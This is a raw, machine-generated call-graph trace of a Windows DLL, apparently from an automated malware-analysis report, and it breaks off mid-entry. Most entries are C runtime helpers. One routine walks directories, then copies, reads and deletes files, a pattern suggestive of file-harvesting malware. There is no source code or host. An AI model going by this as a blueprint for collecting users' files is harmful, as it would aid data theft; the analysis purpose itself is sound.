6334->6335 6335->6316 6368 20de56b9 RtlLeaveCriticalSection 6336->6368 6338 20de4a7e 6338->6307 6338->6308 6369 20de6025 6339->6369 6342 20de4ae2 6345 20de4b39 _abort 8 API calls 6342->6345 6343 20de4ac2 GetPEB 6343->6342 6344 20de4ad2 GetCurrentProcess TerminateProcess 6343->6344 6344->6342 6346 20de4aea ExitProcess 6345->6346 6350 20de50e1 6347->6350 6349 20de5156 6349->6314 6351 20de50ed ___DestructExceptionObject 6350->6351 6358 20de5671 RtlEnterCriticalSection 6351->6358 6353 20de50fb 6359 20de515a 6353->6359 6357 20de5119 _abort 6357->6349 6358->6353 6360 20de517a 6359->6360 6361 20de5182 6359->6361 6362 20de2ada _ValidateLocalCookies 5 API calls 6360->6362 6361->6360 6364 20de571e _free 20 API calls 6361->6364 6363 20de5108 6362->6363 6365 20de5126 6363->6365 6364->6360 6366 20de56b9 _abort RtlLeaveCriticalSection 6365->6366 6367 20de5130 6366->6367 6367->6357 6368->6338 6370 20de604a 6369->6370 6374 20de6040 6369->6374 6371 20de5c45 __dosmaperr 5 API calls 6370->6371 6371->6374 6372 20de2ada _ValidateLocalCookies 5 API calls 6373 20de4abe 6372->6373 6373->6342 6373->6343 6374->6372 6375->6197 6379 20de56b9 RtlLeaveCriticalSection 6376->6379 6378 20de6e16 6378->6197 6379->6378 6381 20de54c4 6380->6381 6387 20de54ba 6380->6387 6382 20de5af6 _abort 38 API calls 6381->6382 6381->6387 6383 20de54e5 6382->6383 6388 20de7a00 6383->6388 6387->6202 6387->6203 6389 20de54fe 6388->6389 6390 20de7a13 6388->6390 6392 20de7a2d 6389->6392 6390->6389 6396 20de7f0f 6390->6396 6393 20de7a55 6392->6393 6394 20de7a40 6392->6394 6393->6387 6394->6393 6395 20de6d7e __fassign 38 API calls 6394->6395 6395->6393 6397 20de7f1b ___DestructExceptionObject 6396->6397 6398 20de5af6 _abort 38 API calls 6397->6398 6399 20de7f24 6398->6399 6400 20de7f72 _abort 6399->6400 6408 20de5671 RtlEnterCriticalSection 6399->6408 6400->6389 6402 20de7f42 6409 20de7f86 6402->6409 6407 20de55a8 _abort 38 API calls 6407->6400 6408->6402 6410 20de7f94 __fassign 6409->6410 6412 20de7f56 6409->6412 6410->6412 6416 20de7cc2 6410->6416 6413 20de7f75 6412->6413 6526 20de56b9 RtlLeaveCriticalSection 6413->6526 6415 20de7f69 6415->6400 6415->6407 6417 20de7d42 6416->6417 6424 20de7cd8 6416->6424 6419 20de571e _free 20 API calls 6417->6419 6443 20de7d90 6417->6443 6420 20de7d64 6419->6420 6422 20de571e _free 20 API calls 6420->6422 6421 20de7d0b 6423 20de7d2d 6421->6423 6430 20de571e _free 20 API calls 6421->6430 6426 20de7d77 6422->6426 6427 20de571e _free 20 API calls 6423->6427 6424->6417 6424->6421 6425 20de571e _free 20 API calls 6424->6425 6428 20de7d00 6425->6428 6429 20de571e _free 20 API calls 6426->6429 6431 20de7d37 6427->6431 6444 20de90ba 6428->6444 6435 20de7d85 6429->6435 6436 20de7d22 6430->6436 6437 20de571e _free 20 API calls 6431->6437 6432 20de7dfe 6433 20de571e _free 20 API calls 6432->6433 6438 20de7e04 6433->6438 6440 20de571e _free 20 API calls 6435->6440 6472 20de91b8 6436->6472 6437->6417 6438->6412 6439 20de7d9e 6439->6432 6442 20de571e 20 API calls _free 6439->6442 6440->6443 6442->6439 6484 20de7e35 6443->6484 6445 20de90cb 6444->6445 6471 20de91b4 6444->6471 6446 20de90dc 6445->6446 6447 20de571e _free 20 API calls 6445->6447 6448 20de90ee 6446->6448 6449 20de571e _free 20 API calls 6446->6449 6447->6446 6450 20de571e _free 20 API calls 6448->6450 6453 20de9100 6448->6453 6449->6448 6450->6453 6451 20de571e _free 20 API calls 6454 20de9112 6451->6454 6452 20de9124 6456 20de9136 6452->6456 6457 20de571e _free 20 API calls 6452->6457 6453->6451 6453->6454 6454->6452 6455 20de571e _free 20 API calls 6454->6455 6455->6452 6458 20de9148 6456->6458 6460 20de571e _free 20 API calls 6456->6460 6457->6456 6459 20de915a 6458->6459 6461 20de571e _free 20 API calls 6458->6461 6462 20de916c 6459->6462 6463 20de571e _free 20 API calls 6459->6463 6460->6458 6461->6459 6464 20de917e 6462->6464 6465 20de571e _free 20 API calls 6462->6465 6463->6462 6466 20de9190 6464->6466 6468 20de571e _free 20 API calls 6464->6468 6465->6464 6467 20de91a2 6466->6467 6469 20de571e _free 20 API calls 6466->6469 6470 20de571e _free 20 API calls 6467->6470 6467->6471 6468->6466 6469->6467 6470->6471 6471->6421 6473 20de91c5 6472->6473 6483 20de921d 6472->6483 6474 20de571e _free 20 API calls 6473->6474 6475 20de91d5 6473->6475 6474->6475 6476 20de571e _free 20 API calls 6475->6476 6478 20de91e7 6475->6478 6476->6478 6477 20de91f9 6480 20de920b 6477->6480 6481 20de571e _free 20 API calls 6477->6481 6478->6477 6479 20de571e _free 20 API calls 6478->6479 6479->6477 6482 20de571e _free 20 API calls 6480->6482 6480->6483 6481->6480 6482->6483 6483->6423 6485 20de7e60 6484->6485 6486 20de7e42 6484->6486 6485->6439 6486->6485 6490 20de925d 6486->6490 6489 20de571e _free 20 API calls 6489->6485 6491 20de7e5a 6490->6491 6492 20de926e 6490->6492 6491->6489 6493 20de9221 __fassign 20 API calls 6492->6493 6494 20de9276 6493->6494 6495 20de9221 __fassign 20 API calls 6494->6495 6496 20de9281 6495->6496 6497 20de9221 __fassign 20 API calls 6496->6497 6498 20de928c 6497->6498 6499 20de9221 __fassign 20 API calls 6498->6499 6500 20de9297 6499->6500 6501 20de9221 __fassign 20 API calls 6500->6501 6502 20de92a5 6501->6502 6503 20de571e _free 20 API calls 6502->6503 6504 20de92b0 6503->6504 6505 20de571e _free 20 API calls 6504->6505 6506 20de92bb 6505->6506 6507 20de571e _free 20 API calls 6506->6507 6508 20de92c6 6507->6508 6509 20de9221 __fassign 20 API calls 6508->6509 6510 20de92d4 6509->6510 6511 20de9221 __fassign 20 API calls 6510->6511 6512 20de92e2 6511->6512 6513 20de9221 __fassign 20 API calls 6512->6513 6514 20de92f3 6513->6514 6515 20de9221 __fassign 20 API calls 6514->6515 6516 20de9301 6515->6516 6517 20de9221 __fassign 20 API calls 6516->6517 6518 20de930f 6517->6518 6519 20de571e _free 20 API calls 6518->6519 6520 20de931a 6519->6520 6521 20de571e _free 20 API calls 6520->6521 6522 20de9325 6521->6522 6523 20de571e _free 20 API calls 6522->6523 6524 20de9330 6523->6524 6525 20de571e _free 20 API calls 6524->6525 6525->6491 6526->6415 6532 20de6b05 6527->6532 6536 20de6baf 6527->6536 6529 20de2ada _ValidateLocalCookies 5 API calls 6531 20de6c5b 6529->6531 6531->6220 6537 20de86e4 6532->6537 6535 20de8a3e 43 API calls 6535->6536 6536->6529 6538 20de54a7 __fassign 38 API calls 6537->6538 6539 20de8704 MultiByteToWideChar 6538->6539 6541 20de8742 6539->6541 6549 20de87da 6539->6549 6544 20de56d0 21 API calls 6541->6544 6546 20de8763 ___scrt_fastfail 6541->6546 6542 20de2ada _ValidateLocalCookies 5 API calls 6545 20de6b66 6542->6545 6543 20de87d4 6556 20de8801 6543->6556 6544->6546 6551 20de8a3e 6545->6551 6546->6543 6548 20de87a8 MultiByteToWideChar 6546->6548 6548->6543 6550 20de87c4 GetStringTypeW 6548->6550 6549->6542 6550->6543 6552 20de54a7 __fassign 38 API calls 6551->6552 6553 20de8a51 6552->6553 6560 20de8821 6553->6560 6557 20de881e 6556->6557 6558 20de880d 6556->6558 6557->6549 6558->6557 6559 20de571e _free 20 API calls 6558->6559 6559->6557 6561 20de883c 6560->6561 6562 20de8862 MultiByteToWideChar 6561->6562 6563 20de888c 6562->6563 6564 20de8a16 6562->6564 6569 20de56d0 21 API calls 6563->6569 6571 20de88ad 6563->6571 6565 20de2ada _ValidateLocalCookies 5 API calls 6564->6565 6566 20de6b87 6565->6566 6566->6535 6567 20de8962 6573 20de8801 __freea 20 API calls 6567->6573 6568 20de88f6 MultiByteToWideChar 6568->6567 6570 20de890f 6568->6570 6569->6571 6587 20de5f19 6570->6587 6571->6567 6571->6568 6573->6564 6575 20de8939 6575->6567 6579 20de5f19 11 API calls 6575->6579 6576 20de8971 6577 20de56d0 21 API calls 6576->6577 6581 20de8992 6576->6581 6577->6581 6578 20de8a07 6580 20de8801 __freea 20 API calls 6578->6580 6579->6567 6580->6567 6581->6578 6582 20de5f19 11 API calls 6581->6582 6583 20de89e6 6582->6583 6583->6578 6584 20de89f5 WideCharToMultiByte 6583->6584 6584->6578 6585 20de8a35 6584->6585 6586 20de8801 __freea 20 API calls 6585->6586 6586->6567 6588 20de5c45 __dosmaperr 5 API calls 6587->6588 6589 20de5f40 6588->6589 6592 20de5f49 6589->6592 6595 20de5fa1 6589->6595 6593 20de2ada _ValidateLocalCookies 5 API calls 6592->6593 6594 20de5f9b 6593->6594 6594->6567 6594->6575 6594->6576 6596 20de5c45 __dosmaperr 5 API calls 6595->6596 6597 20de5fc8 6596->6597 6598 20de2ada _ValidateLocalCookies 5 API calls 6597->6598 6599 20de5f89 LCMapStringW 6598->6599 6599->6592 6601 20de6892 ___DestructExceptionObject 6600->6601 6608 20de5671 RtlEnterCriticalSection 6601->6608 6603 20de689c 6609 20de68f1 6603->6609 6607 20de68b5 _abort 6607->6225 6608->6603 6621 20de7011 6609->6621 6611 20de693f 6612 20de7011 26 API calls 6611->6612 6613 20de695b 6612->6613 6614 20de7011 26 API calls 6613->6614 6616 20de6979 6614->6616 6615 20de68a9 6618 20de68bd 6615->6618 6616->6615 6617 20de571e _free 20 API calls 6616->6617 6617->6615 6635 20de56b9 RtlLeaveCriticalSection 6618->6635 6620 20de68c7 6620->6607 6622 20de7022 6621->6622 6631 20de701e 6621->6631 6623 20de7029 6622->6623 6626 20de703c ___scrt_fastfail 6622->6626 6624 20de6368 __dosmaperr 20 API calls 6623->6624 6625 20de702e 6624->6625 6627 20de62ac ___std_exception_copy 26 API calls 6625->6627 6628 20de706a 6626->6628 6629 20de7073 6626->6629 6626->6631 6627->6631 6630 20de6368 __dosmaperr 20 API calls 6628->6630 6629->6631 6633 20de6368 __dosmaperr 20 API calls 6629->6633 6632 20de706f 6630->6632 6631->6611 6634 20de62ac ___std_exception_copy 26 API calls 6632->6634 6633->6632 6634->6631 6635->6620 6639 20de7092 6636->6639 6640 20de54a7 __fassign 38 API calls 6639->6640 6641 20de70a6 6640->6641 6641->6119 7029 20de4a9a 7032 20de5411 7029->7032 7033 20de541d _abort 7032->7033 7034 20de5af6 _abort 38 API calls 7033->7034 7037 20de5422 7034->7037 7035 20de55a8 _abort 38 API calls 7036 20de544c 7035->7036 7037->7035 5829 20de1c5b 5830 20de1c6b ___scrt_fastfail 5829->5830 5833 20de12ee 5830->5833 5832 20de1c87 5834 20de1324 ___scrt_fastfail 5833->5834 5835 20de13b7 GetEnvironmentVariableW 5834->5835 5859 20de10f1 5835->5859 5838 20de10f1 57 API calls 5839 20de1465 5838->5839 5840 20de10f1 57 API calls 5839->5840 5841 20de1479 5840->5841 5842 20de10f1 57 API calls 5841->5842 5843 20de148d 5842->5843 5844 20de10f1 57 API calls 5843->5844 5845 20de14a1 5844->5845 5846 20de10f1 57 API calls 5845->5846 5847 20de14b5 lstrlenW 5846->5847 5848 20de14d9 lstrlenW 5847->5848 5849 20de14d2 5847->5849 5850 20de10f1 57 API calls 5848->5850 5849->5832 5851 20de1501 lstrlenW lstrcatW 5850->5851 5852 20de10f1 57 API calls 5851->5852 5853 20de1539 lstrlenW lstrcatW 5852->5853 5854 20de10f1 57 API calls 5853->5854 5855 20de156b lstrlenW lstrcatW 5854->5855 5856 20de10f1 57 API calls 5855->5856 5857 20de159d lstrlenW lstrcatW 5856->5857 5858 20de10f1 57 API calls 5857->5858 5858->5849 5860 20de1118 ___scrt_fastfail 5859->5860 5861 20de1129 lstrlenW 5860->5861 5872 20de2c40 5861->5872 5864 20de1168 lstrlenW 5865 20de1177 lstrlenW FindFirstFileW 5864->5865 5866 20de11a0 5865->5866 5867 20de11e1 5865->5867 5868 20de11aa 5866->5868 5869 20de11c7 FindNextFileW 5866->5869 5867->5838 5868->5869 5874 20de1000 5868->5874 5869->5866 5871 20de11da FindClose 5869->5871 5871->5867 5873 20de1148 lstrcatW lstrlenW 5872->5873 5873->5864 5873->5865 5875 20de1022 ___scrt_fastfail 5874->5875 5876 20de10af 5875->5876 5877 20de102f lstrcatW lstrlenW 5875->5877 5880 20de10b5 lstrlenW 5876->5880 5890 20de10ad 5876->5890 5878 20de105a lstrlenW 5877->5878 5879 20de106b lstrlenW 5877->5879 5878->5879 5891 20de1e89 lstrlenW 5879->5891 5905 20de1e16 5880->5905 5883 20de1088 GetFileAttributesW 5885 20de109c 5883->5885 5883->5890 5884 20de10ca 5886 20de1e89 5 API calls 5884->5886 5884->5890 5885->5890 5897 20de173a 5885->5897 5887 20de10df 5886->5887 5910 20de11ea 5887->5910 5890->5868 5892 20de2c40 ___scrt_fastfail 5891->5892 5893 20de1ea7 lstrcatW lstrlenW 5892->5893 5894 20de1ec2 5893->5894 5895 20de1ed1 lstrcatW 5893->5895 5894->5895 5896 20de1ec7 lstrlenW 5894->5896 5895->5883 5896->5895 5898 20de1747 ___scrt_fastfail 5897->5898 5925 20de1cca 5898->5925 5901 20de199f 5901->5890 5903 20de1824 ___scrt_fastfail _strlen 5903->5901 5945 20de15da 5903->5945 5906 20de1e29 5905->5906 5909 20de1e4c 5905->5909 5907 20de1e2d lstrlenW 5906->5907 5906->5909 5908 20de1e3f lstrlenW 5907->5908 5907->5909 5908->5909 5909->5884 5911 20de120e ___scrt_fastfail 5910->5911 5912 20de1e89 5 API calls 5911->5912 5913 20de1220 GetFileAttributesW 5912->5913 5914 20de1246 5913->5914 5915 20de1235 5913->5915 5916 20de1e89 5 API calls 5914->5916 5915->5914 5918 20de173a 35 API calls 5915->5918 5917 20de1258 5916->5917 5919 20de10f1 56 API calls 5917->5919 5918->5914 5920 20de126d 5919->5920 5921 20de1e89 5 API calls 5920->5921 5922 20de127f ___scrt_fastfail 5921->5922 5923 20de10f1 56 API calls 5922->5923 5924 20de12e6 5923->5924 5924->5890 5926 20de1cf1 ___scrt_fastfail 5925->5926 5927 20de1d0f CopyFileW CreateFileW 5926->5927 5928 20de1d44 DeleteFileW 5927->5928 5929 20de1d55 GetFileSize 5927->5929 5934 20de1808 5928->5934 5930 20de1ede 22 API calls 5929->5930 5931 20de1d66 ReadFile 5930->5931 5932 20de1d7d CloseHandle DeleteFileW 5931->5932 5933 20de1d94 CloseHandle DeleteFileW 5931->5933 5932->5934 5933->5934 5934->5901 5935 20de1ede 5934->5935 5937 20de222f 5935->5937 5938 20de224e 5937->5938 5941 20de2250 5937->5941 5953 20de474f 5937->5953 5958 20de47e5 5937->5958 5938->5903 5940 20de2908 5942 20de35d2 __CxxThrowException@8 RaiseException 5940->5942 5941->5940 5965 20de35d2 5941->5965 5943 20de2925 5942->5943 5943->5903 5946 20de160c _strcat _strlen 5945->5946 5947 20de163c lstrlenW 5946->5947 6053 20de1c9d 5947->6053 5949 20de1655 lstrcatW lstrlenW 5950 20de1678 5949->5950 5951 20de167e lstrcatW 5950->5951 5952 20de1693 ___scrt_fastfail 5950->5952 5951->5952 5952->5903 5968 20de4793 5953->5968 5956 20de478f 5956->5937 5957 20de4765 5974 20de2ada 5957->5974 5963 20de56d0 __dosmaperr 5958->5963 5959 20de570e 5987 20de6368 5959->5987 5960 20de56f9 RtlAllocateHeap 5962 20de570c 5960->5962 5960->5963 5962->5937 5963->5959 5963->5960 5964 20de474f __dosmaperr 7 API calls 5963->5964 5964->5963 5966 20de35f2 RaiseException 5965->5966 5966->5940 5969 20de479f ___DestructExceptionObject 5968->5969 5981 20de5671 RtlEnterCriticalSection 5969->5981 5971 20de47aa 5982 20de47dc 5971->5982 5973 20de47d1 _abort 5973->5957 5975 20de2ae5 IsProcessorFeaturePresent 5974->5975 5976 20de2ae3 5974->5976 5978 20de2b58 5975->5978 5976->5956 5986 20de2b1c SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 5978->5986 5980 20de2c3b 5980->5956 5981->5971 5985 20de56b9 RtlLeaveCriticalSection 5982->5985 5984 20de47e3 5984->5973 5985->5984 5986->5980 5990 20de5b7a GetLastError 5987->5990 5991 20de5b99 5990->5991 5992 20de5b93 5990->5992 5996 20de5bf0 SetLastError 5991->5996 6016 20de637b 5991->6016 6009 20de5e08 5992->6009 5998 20de5bf9 5996->5998 5998->5962 6001 20de5bb9 6004 20de5be7 SetLastError 6001->6004 6002 20de5bcf 6036 20de593c 6002->6036 6003 20de5bb3 6023 20de571e 6003->6023 6004->5998 6007 20de571e _free 17 API calls 6008 20de5be0 6007->6008 6008->5996 6008->6004 6041 20de5c45 6009->6041 6011 20de5e2f 6012 20de5e47 TlsGetValue 6011->6012 6015 20de5e3b 6011->6015 6012->6015 6013 20de2ada _ValidateLocalCookies 5 API calls 6014 20de5e58 6013->6014 6014->5991 6015->6013 6022 20de6388 __dosmaperr 6016->6022 6017 20de63c8 6019 20de6368 __dosmaperr 19 API calls 6017->6019 6018 20de63b3 RtlAllocateHeap 6020 20de5bab 6018->6020 6018->6022 6019->6020 6020->6003 6029 20de5e5e 6020->6029 6021 20de474f __dosmaperr 7 API calls 6021->6022 6022->6017 6022->6018 6022->6021 6024 20de5729 HeapFree 6023->6024 6028 20de5752 __dosmaperr 6023->6028 6025 20de573e 6024->6025 6024->6028 6026 20de6368 __dosmaperr 18 API calls 6025->6026 6027 20de5744 GetLastError 6026->6027 6027->6028 6028->6001 6030 20de5c45 __dosmaperr 5 API calls 6029->6030 6031 20de5e85 6030->6031 6032 20de5ea0 TlsSetValue 6031->6032 6035 20de5e94 6031->6035 6032->6035 6033 20de2ada _ValidateLocalCookies 5 API calls 6034 20de5bc8 6033->6034 6034->6002 6034->6003 6035->6033 6047 20de5914 6036->6047 6042 20de5c71 6041->6042 6043 20de5c75 __crt_fast_encode_pointer 6041->6043 6042->6043 6044 20de5ce1 __dosmaperr LoadLibraryExW GetLastError LoadLibraryExW FreeLibrary 6042->6044 6045 20de5c95 6042->6045 6043->6011 6044->6042 6045->6043 6046 20de5ca1 GetProcAddress 6045->6046 6046->6043 6048 20de5854 __dosmaperr RtlEnterCriticalSection RtlLeaveCriticalSection 6047->6048 6049 20de5938 6048->6049 6050 20de58c4 6049->6050 6051 20de5758 __dosmaperr 20 API calls 6050->6051 6052 20de58e8 6051->6052 6052->6007 6054 20de1ca6 _strlen 6053->6054 6054->5949 6642 20de20db 6644 20de20e7 ___DestructExceptionObject 6642->6644 6643 20de20f6 6644->6643 6645 20de2110 dllmain_raw 6644->6645 6649 20de210b 6644->6649 6645->6643 6646 20de212a 6645->6646 6655 20de1eec 6646->6655 6648 20de2177 6648->6643 6650 20de1eec 31 API calls 6648->6650 6649->6643 6649->6648 6652 20de1eec 31 API calls 6649->6652 6651 20de218a 6650->6651 6651->6643 6653 20de2193 dllmain_raw 6651->6653 6654 20de216d dllmain_raw 6652->6654 6653->6643 6654->6648 6656 20de1f2a dllmain_crt_process_detach 6655->6656 6657 20de1ef7 6655->6657 6664 20de1f06 6656->6664 6658 20de1f1c dllmain_crt_process_attach 6657->6658 6659 20de1efc 6657->6659 6658->6664 6660 20de1f12 6659->6660 6661 20de1f01 6659->6661 6670 20de23ec 6660->6670 6661->6664 6665 20de240b 6661->6665 6664->6649 6678 20de53e5 6665->6678 6789 20de3513 6670->6789 6673 20de23f5 6673->6664 6676 20de2408 6676->6664 6677 20de351e 7 API calls 6677->6673 6684 20de5aca 6678->6684 6681 20de351e 6760 20de3820 6681->6760 6683 20de2415 6683->6664 6685 20de5ad4 6684->6685 6686 20de2410 6684->6686 6687 20de5e08 __dosmaperr 11 API calls 6685->6687 6686->6681 6688 20de5adb 6687->6688 6688->6686 6689 20de5e5e __dosmaperr 11 API calls 6688->6689 6690 20de5aee 6689->6690 6692 20de59b5 6690->6692 6693 20de59d0 6692->6693 6694 20de59c0 6692->6694 6693->6686 6698 20de59d6 6694->6698 6697 20de571e _free 20 API calls 6697->6693 6699 20de59e9 6698->6699 6700 20de59ef 6698->6700 6701 20de571e _free 20 API calls 6699->6701 6702 20de571e _free 20 API calls 6700->6702 6701->6700 6703 20de59fb 6702->6703 6704 20de571e _free 20 API calls 6703->6704 6705 20de5a06 6704->6705 6706 20de571e _free 20 API calls 6705->6706 6707 20de5a11 6706->6707 6708 20de571e _free 20 API calls 6707->6708 6709 20de5a1c 6708->6709 6710 20de571e _free 20 API calls 6709->6710 6711 20de5a27 6710->6711 6712 20de571e _free 20 API calls 6711->6712 6713 20de5a32 6712->6713 6714 20de571e _free 20 API calls 6713->6714 6715 20de5a3d 6714->6715 6716 20de571e _free 20 API calls 6715->6716 6717 20de5a48 6716->6717 6718 20de571e _free 20 API calls 6717->6718 6719 20de5a56 6718->6719 6724 20de589c 6719->6724 6730 20de57a8 6724->6730 6726 20de58c0 6727 20de58ec 6726->6727 6743 20de5809 6727->6743 6729 20de5910 6729->6697 6731 20de57b4 ___DestructExceptionObject 6730->6731 6738 20de5671 RtlEnterCriticalSection 6731->6738 6734 20de57be 6736 20de571e _free 20 API calls 6734->6736 6737 20de57e8 6734->6737 6735 20de57f5 _abort 6735->6726 6736->6737 6739 20de57fd 6737->6739 6738->6734 6742 20de56b9 RtlLeaveCriticalSection 6739->6742 6741 20de5807 6741->6735 6742->6741 6744 20de5815 ___DestructExceptionObject 6743->6744 6751 20de5671 RtlEnterCriticalSection 6744->6751 6746 20de581f 6752 20de5a7f 6746->6752 6748 20de5832 6756 20de5848 6748->6756 6750 20de5840 _abort 6750->6729 6751->6746 6753 20de5a8e __fassign 6752->6753 6755 20de5ab5 __fassign 6752->6755 6754 20de7cc2 __fassign 20 API calls 6753->6754 6753->6755 6754->6755 6755->6748 6759 20de56b9 RtlLeaveCriticalSection 6756->6759 6758 20de5852 6758->6750 6759->6758 6761 20de382d 6760->6761 6765 20de384b ___vcrt_freefls@4 6760->6765 6762 20de383b 6761->6762 6766 20de3b67 6761->6766 6771 20de3ba2 6762->6771 6765->6683 6776 20de3a82 6766->6776 6768 20de3b81 6769 20de3b99 TlsGetValue 6768->6769 6770 20de3b8d 6768->6770 6769->6770 6770->6762 6772 20de3a82 try_get_function 5 API calls 6771->6772 6773 20de3bbc 6772->6773 6774 20de3bd7 TlsSetValue 6773->6774 6775 20de3bcb 6773->6775 6774->6775 6775->6765 6777 20de3aaa 6776->6777 6781 20de3aa6 __crt_fast_encode_pointer 6776->6781 6777->6781 6782 20de39be 6777->6782 6780 20de3ac4 GetProcAddress 6780->6781 6781->6768 6785 20de39cd try_get_first_available_module 6782->6785 6783 20de3a77 6783->6780 6783->6781 6784 20de39ea LoadLibraryExW 6784->6785 6786 20de3a05 GetLastError 6784->6786 6785->6783 6785->6784 6787 20de3a60 FreeLibrary 6785->6787 6788 20de3a38 LoadLibraryExW 6785->6788 6786->6785 6787->6785 6788->6785 6795 20de3856 6789->6795 6791 20de23f1 6791->6673 6792 20de53da 6791->6792 6793 20de5b7a __dosmaperr 20 API calls 6792->6793 6794 20de23fd 6793->6794 6794->6676 6794->6677 6796 20de385f 6795->6796 6797 20de3862 GetLastError 6795->6797 6796->6791 6798 20de3b67 ___vcrt_FlsGetValue 6 API calls 6797->6798 6799 20de3877 6798->6799 6800 20de38dc SetLastError 6799->6800 6801 20de3ba2 ___vcrt_FlsSetValue 6 API calls 6799->6801 6806 20de3896 6799->6806 6800->6791 6802 20de3890 6801->6802 6803 20de38b8 6802->6803 6804 20de3ba2 ___vcrt_FlsSetValue 6 API calls 6802->6804 6802->6806 6805 20de3ba2 ___vcrt_FlsSetValue 6 API calls 6803->6805 6803->6806 6804->6803 6805->6806 6806->6800 7709 20de2418 7710 20de2420 ___scrt_release_startup_lock 7709->7710 7713 20de47f5 7710->7713 7712 20de2448 7714 20de4808 7713->7714 7715 20de4804 7713->7715 7718 20de4815 7714->7718 7715->7712 7719 20de5b7a __dosmaperr 20 API calls 7718->7719 7722 20de482c 7719->7722 7720 20de2ada _ValidateLocalCookies 5 API calls 7721 20de4811 7720->7721 7721->7712 7722->7720 6807 20de4ed7 6808 20de6d60 51 API calls 6807->6808 6809 20de4ee9 6808->6809 6818 20de7153 GetEnvironmentStringsW 6809->6818 6812 20de4ef4 6814 20de571e _free 20 API calls 6812->6814 6815 20de4f29 6814->6815 6816 20de4eff 6817 20de571e _free 20 API calls 6816->6817 6817->6812 6819 20de71bd 6818->6819 6820 20de716a 6818->6820 6821 20de4eee 6819->6821 6822 20de71c6 FreeEnvironmentStringsW 6819->6822 6823 20de7170 WideCharToMultiByte 6820->6823 6821->6812 6830 20de4f2f 6821->6830 6822->6821 6823->6819 6824 20de718c 6823->6824 6825 20de56d0 21 API calls 6824->6825 6826 20de7192 6825->6826 6827 20de7199 WideCharToMultiByte 6826->6827 6828 20de71af 6826->6828 6827->6828 6829 20de571e _free 20 API calls 6828->6829 6829->6819 6831 20de4f44 6830->6831 6832 20de637b __dosmaperr 20 API calls 6831->6832 6842 20de4f6b 6832->6842 6833 20de4fcf 6834 20de571e _free 20 API calls 6833->6834 6835 20de4fe9 6834->6835 6835->6816 6836 20de637b __dosmaperr 20 API calls 6836->6842 6837 20de4fd1 6856 20de5000 6837->6856 6841 20de571e _free 20 API calls 6841->6833 6842->6833 6842->6836 6842->6837 6843 20de4ff3 6842->6843 6845 20de571e _free 20 API calls 6842->6845 6847 20de544d 6842->6847 6844 20de62bc ___std_exception_copy 11 API calls 6843->6844 6846 20de4fff 6844->6846 6845->6842 6848 20de545a 6847->6848 6849 20de5468 6847->6849 6848->6849 6853 20de547f 6848->6853 6850 20de6368 __dosmaperr 20 API calls 6849->6850 6851 20de5470 6850->6851 6852 20de62ac ___std_exception_copy 26 API calls 6851->6852 6854 20de547a 6852->6854 6853->6854 6855 20de6368 __dosmaperr 20 API calls 6853->6855 6854->6842 6855->6851 6857 20de4fd7 6856->6857 6858 20de500d 6856->6858 6857->6841 6859 20de5024 6858->6859 6860 20de571e _free 20 API calls 6858->6860 6861 20de571e _free 20 API calls 6859->6861 6860->6858 6861->6857 6862 20de73d5 6863 20de73e1 ___DestructExceptionObject 6862->6863 6874 20de5671 RtlEnterCriticalSection 6863->6874 6865 20de73e8 6875 20de8be3 6865->6875 6867 20de73f7 6868 20de7406 6867->6868 6888 20de7269 GetStartupInfoW 6867->6888 6899 20de7422 6868->6899 6872 20de7417 _abort 6874->6865 6876 20de8bef ___DestructExceptionObject 6875->6876 6877 20de8bfc 6876->6877 6878 20de8c13 6876->6878 6879 20de6368 __dosmaperr 20 API calls 6877->6879 6902 20de5671 RtlEnterCriticalSection 6878->6902 6881 20de8c01 6879->6881 6882 20de62ac ___std_exception_copy 26 API calls 6881->6882 6884 20de8c0b _abort 6882->6884 6884->6867 6885 20de8c1f 6887 20de8c4b 6885->6887 6903 20de8b34 6885->6903 6910 20de8c72 6887->6910 6889 20de7318 6888->6889 6890 20de7286 6888->6890 6894 20de731f 6889->6894 6890->6889 6891 20de8be3 27 API calls 6890->6891 6892 20de72af 6891->6892 6892->6889 6893 20de72dd GetFileType 6892->6893 6893->6892 6895 20de7326 6894->6895 6896 20de7369 GetStdHandle 6895->6896 6897 20de73d1 6895->6897 6898 20de737c GetFileType 6895->6898 6896->6895 6897->6868 6898->6895 6921 20de56b9 RtlLeaveCriticalSection 6899->6921 6901 20de7429 6901->6872 6902->6885 6904 20de637b __dosmaperr 20 API calls 6903->6904 6905 20de8b46 6904->6905 6909 20de8b53 6905->6909 6913 20de5eb7 6905->6913 6906 20de571e _free 20 API calls 6908 20de8ba5 6906->6908 6908->6885 6909->6906 6920 20de56b9 RtlLeaveCriticalSection 6910->6920 6912 20de8c79 6912->6884 6914 20de5c45 __dosmaperr 5 API calls 6913->6914 6915 20de5ede 6914->6915 6916 20de5efc InitializeCriticalSectionAndSpinCount 6915->6916 6917 20de5ee7 6915->6917 6916->6917 6918 20de2ada _ValidateLocalCookies 5 API calls 6917->6918 6919 20de5f13 6918->6919 6919->6905 6920->6912 6921->6901 6922 20de36d0 6923 20de36e2 6922->6923 6925 20de36f0 @_EH4_CallFilterFunc@8 6922->6925 6924 20de2ada _ValidateLocalCookies 5 API calls 6923->6924 6924->6925 7038 20de3c90 RtlUnwind 7132 20de5351 7133 20de5374 7132->7133 7134 20de5360 7132->7134 7135 20de571e _free 20 API calls 7133->7135 7134->7133 7136 20de571e _free 20 API calls 7134->7136 7137 20de5386 7135->7137 7136->7133 7138 20de571e _free 20 API calls 7137->7138 7139 20de5399 7138->7139 7140 20de571e _free 20 API calls 7139->7140 7141 20de53aa 7140->7141 7142 20de571e _free 20 API calls 7141->7142 7143 20de53bb 7142->7143 7144 20de724e GetProcessHeap 7145 20de284f 7148 20de2882 7145->7148 7151 20de3550 7148->7151 7150 20de285d 7152 20de358a 7151->7152 7153 20de355d 7151->7153 7152->7150 7153->7152 7153->7153 7154 20de47e5 ___std_exception_copy 21 API calls 7153->7154 7155 20de357a 7154->7155 7155->7152 7156 20de544d ___std_exception_copy 26 API calls 7155->7156 7156->7152 7723 20de220c 7724 20de221a dllmain_dispatch 7723->7724 7725 20de2215 7723->7725 7727 20de22b1 7725->7727 7728 20de22c7 7727->7728 7730 20de22d0 7728->7730 7731 20de2264 GetSystemTimeAsFileTime GetCurrentThreadId GetCurrentProcessId QueryPerformanceCounter 7728->7731 7730->7724 7731->7730 7157 20de5348 7160 20de3529 7157->7160 7161 20de3543 7160->7161 7162 20de3532 7160->7162 7168 20de391b 7162->7168 7169 20de3925 7168->7169 7170 20de3537 7168->7170 7180 20de3b2c 7169->7180 7172 20de3972 7170->7172 7173 